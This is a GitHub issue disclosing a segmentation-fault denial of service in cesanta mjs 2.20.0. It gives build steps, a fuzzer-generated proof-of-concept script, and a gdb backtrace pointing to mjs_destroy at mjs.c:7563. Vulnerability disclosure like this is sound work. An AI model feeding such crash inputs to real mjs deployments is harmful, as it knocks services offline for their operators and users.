SegFaultOnPc in mjs_destroy() at mjs.c:7563 #253

Open
vorfreuder opened this issue Nov 19, 2023 · 0 comments
vorfreuder commented Nov 19, 2023

The name of the affected product
mjs

The affected version
Commit: b1b6eac (Tag: 2.20.0)

Description
An issue in cesanta mjs 2.20.0 allows a remote attacker to cause a denial of service via the mjs_destroy function in the mjs.c file.

Vulnerability Type
Segmentation fault on program counter

Environment

  • Operating System
Distributor ID: Ubuntu
Description:    Ubuntu 18.04.6 LTS
Release:        18.04
Codename:       bionic
  • Compiler
Ubuntu clang version 12.0.1-++20211102090516+fed41342a82f-1~exp1~20211102211019.11
Target: x86_64-pc-linux-gnu
Thread model: posix

Steps to Reproduce

git clone https://github.com/cesanta/mjs
cd mjs
git checkout b1b6eac
clang -ggdb -O0 -DMJS_MAIN mjs.c -o mjs -ldl
poc
let i, a = 0, b0= 0, c = 0continu, d0, e = 0;

for (i = 8; i < 20; i++) {
  a let z = JSON.parse('""');  // Zlength string
let s2 = JSON.stringify+=888 i;
c /= 0, c = 0let s = '08888888888888    true, "d": [null], "e": "1\\n2"}';
let o = JSON.parse(s);
let z = JSON.parse('""');  // Zlength string
let s2 = JSON.stringify(o)AAA

run command

mjs -f poc

gdb info

Program terminated with signal SIGSEGV, Segmentation fault.
#0  0x000000000040c168 in mjs_destroy (mjs=0x1db2260) at mjs.c:7563
7563      mbuf_free(&mjs->json_visited_stack);
(gdb) bt
#0  0x000000000040c168 in mjs_destroy (mjs=0x1db2260) at mjs.c:7563
#1  0x000000000040d413 in mjs_exec_internal (mjs=0x1db2260, 
    path=0x7ffd203438b4 "/cve/mjs_latest/pending3/id:000167,sig:06,src:003368,time:694819496,execs:215291083,op:havoc,rep:1", 
    src=0x1db3cb0 "let i, a = 0, b0= 0, c = 0continu, d0, e = 0;\n\nfor (i = 8; i < 20; i++) {\n  a let z = JSON.parse('\"\"');  // Zlength string\nlet s2 = JSON.stringify+=888 i;\nc /= 0, c = 0let s = '0", '8' <repeats 13 times>, "    true,"..., generate_jsc=0, res=0x7ffd20341a58)
    at mjs.c:9044
#2  0x000000000040d4d5 in mjs_exec_file (mjs=0x1db2260, 
    path=0x7ffd203438b4 "/cve/mjs_latest/pending3/id:000167,sig:06,src:003368,time:694819496,execs:215291083,op:havoc,rep:1", 
    res=0x7ffd20341aa0) at mjs.c:9067
#3  0x000000000041082e in main (argc=3, argv=0x7ffd20341ba8) at mjs.c:11406
(gdb) list
7558      mbuf_free(&mjs->owned_strings);
7559      mbuf_free(&mjs->foreign_strings);
7560      mbuf_free(&mjs->owned_values);
7561      mbuf_free(&mjs->scopes);
7562      mbuf_free(&mjs->loop_addresses);
7563      mbuf_free(&mjs->json_visited_stack);
7564      free(mjs->error_msg);
7565      free(mjs->stack_trace);
7566      mjs_ffi_args_free_list(mjs);
7567      gc_arena_destroy(mjs, &mjs->object_arena);